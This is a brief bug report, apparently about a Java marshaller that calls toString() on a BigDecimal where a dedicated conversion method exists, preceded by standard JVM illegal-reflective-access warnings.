WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations
WARNING: All illegal access operations will be denied in a future release

Masrhaller.java line 1766 does an obj.toString() when marshalling a BigDecimal. it should probably be doing something similar to lines 1814-1818 and call convertBigDecimalToString if it's a BigDecimal.